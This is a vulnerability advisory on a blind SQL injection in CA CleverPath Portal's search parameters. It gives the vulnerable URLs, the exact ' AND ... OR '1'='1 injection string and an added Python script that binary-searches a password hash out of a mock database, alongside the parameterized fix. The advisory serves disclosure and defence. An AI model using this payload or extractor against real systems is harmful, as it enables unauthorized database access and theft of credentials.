Security Advisory: CA CleverPath SQL Injection

Background

The CA CleverPath Portal is a customizable portal for the aggregation and integration of data and applications. It is integrated into multiple CA products, including various Unicenter components. CleverPath stores its data in a back-end database and can use either the built-in database or an external one.

Scope

After observing irregular behavior in CleverPath when modifying the query parameters of the search mechanism, Hacktics researched the way the search query is constructed and identified an SQL injection vulnerability in that implementation.

The Finding

The search mechanism of the CleverPath Portal is vulnerable to SQL injection: the values of certain search parameters are placed into the query sent to the back-end database without proper handling, so an attacker can alter the query and, through a blind (binary search) technique, extract data the search is not meant to return.

Details

The light search URL is:
 
https://foo.bar:fooport/servlet/portal/search/execute?CHARSET=UTF-8&showtemplate=false&OFINTEREST=PARAM&showtemplate=false

The advanced search URL is:
 
https://foo.bar:fooport/servlet/portal/search/execute?CHARSET=UTF-8&showtemplate=false&Search=Search&TITLE=&DESCRIPTION=PARAM&FILENAME=&OWNERNAME=&GROUPNAME=&DATES=NONE&ResultCount=20&CREATE_OPT=0&MODIFIED_OPT=0&MODIFIED_BAFT=&MODIFIED_BAFT_YEAR=&MODIFIED_BAFT_MONTH=&MODIFIED_BAFT_DAY=&MODIFIED_TO_YEAR=&MODIFIED_TO_MONTH=&MODIFIED_TO_DAY=&MODIFIED_FROM_YEAR=&MODIFIED_FROM_MONTH=&MODIFIED_FROM_DAY=

By replacing the value of certain search parameters, e.g. OFINTEREST in the light search or DESCRIPTION in the advanced search, with SQL syntax, it is possible to modify the query sent to the database and thus the query results. It is important to note that conventional injection techniques such as UNION SELECT cannot be used here; the injection is exploitable only through the binary search attack vector described by Sverre H. Huseby in his posting "Using Binary Search with SQL Injection", in which a true/false condition injected into the query is used, one comparison at a time, to recover data that the query itself never displays.
 
Note: The injection works only if the first character of the input is a single quote ('). The AND operand must also appear before the OR operand in the injection string, and the OR '1'='1 operand must be present in the query; otherwise no results are returned even when the condition in the AND clause is true.
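The following is an added example, not code from the advisory or from CA: a small sqlite3 mock of a search that splices a DESCRIPTION-style parameter into a LIKE pattern, beside its parameterized fix, and a blind extractor that uses the ' AND <cond> OR '1'='1 injection string from the note above as a true/false oracle and recovers a value by binary search in the way Huseby describes. The table names, sample rows and the exact query shape are assumptions chosen so that the constraints in the note (AND before OR, trailing OR '1'='1) have the effect the advisory reports; the real CleverPath query is not known from this page.

```python
"""Blind (binary-search) SQL injection against a mock of a search mechanism
that concatenates a request parameter into a LIKE pattern.

Constructed example: the schema, rows and query shape are assumptions for
illustration and are not CA CleverPath's code.
"""
import sqlite3


def make_db():
    """Constructed sample data: a documents table plus a secret in another table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE docs(id INTEGER PRIMARY KEY, title TEXT, description TEXT);
        CREATE TABLE users(name TEXT, pwhash TEXT);
        INSERT INTO docs VALUES (1, 'Quarterly report', 'Q1 numbers');
        INSERT INTO docs VALUES (2, 'Portal guide', 'How to use the portal');
        INSERT INTO users VALUES ('admin', 'a3f9c1');
    """)
    return conn


def search_vulnerable(conn, description):
    """Assumed vulnerable shape: the parameter is spliced into a LIKE pattern,
    so whatever the attacker sends is followed by the application's own %'."""
    sql = ("SELECT id FROM docs WHERE description LIKE '%"
           + description + "%' ORDER BY id")
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, description):
    """Same search with a bound parameter: the input can only ever be a pattern."""
    sql = "SELECT id FROM docs WHERE description LIKE ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, ("%" + description + "%",))]


def with_operators_swapped(conn):
    """OR before AND:  ... LIKE '%' OR (1=2 AND '1'='1%')  -> every row, no oracle."""
    return search_vulnerable(conn, "' OR 1=2 AND '1'='1")


class BlindOracle:
    """Turns the vulnerable search into a yes/no oracle for an SQL condition.

    Input  ' AND <cond> OR '1'='1  makes the WHERE clause
        description LIKE '%' AND <cond> OR '1'='1%'
    The trailing OR absorbs the application's %' suffix and compares '1'
    with '1%', which is false; AND binds tighter than OR, so rows come back
    exactly when <cond> holds.
    """

    def __init__(self, conn):
        self.conn = conn
        self.queries = 0  # requests spent, to show the cost of the technique

    def ask(self, cond):
        self.queries += 1
        payload = "' AND " + cond + " OR '1'='1"
        return len(search_vulnerable(self.conn, payload)) > 0

    def char_at(self, expr, pos, lo=32, hi=126):
        """Binary-search the code point of character `pos` of SQL expression `expr`
        within printable ASCII; None once `pos` is past the end of the value."""
        if not self.ask(f"length({expr}) >= {pos}"):
            return None
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return chr(lo)

    def extract(self, expr, max_len=64):
        """Recover a printable-ASCII value one character at a time."""
        out = []
        for pos in range(1, max_len + 1):
            ch = self.char_at(expr, pos)
            if ch is None:
                break
            out.append(ch)
        return "".join(out)


if __name__ == "__main__":
    db = make_db()
    oracle = BlindOracle(db)
    secret = oracle.extract("(SELECT pwhash FROM users WHERE name = 'admin')")
    print(secret, "recovered in", oracle.queries, "requests")
    print("swapped operators:", with_operators_swapped(db))
    print("same payload, parameterized query:", search_fixed(db, "' AND 1=1 OR '1'='1"))
```

Each character costs one length probe plus at most seven comparisons over the 95 printable code points, so a short value leaks in a few dozen requests; against the parameterized version the same payload is just a pattern that matches nothing.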

Affected Systems

Multiple CA products and third-party products that utilize the CleverPath Portal.

Solution

CA was notified of this vulnerability on January 18th and has released a patch correcting the problem.

Credit

The vulnerability was discovered on January 18th, 2007, by Irene Abezgauz, as part of Hacktics' research activities.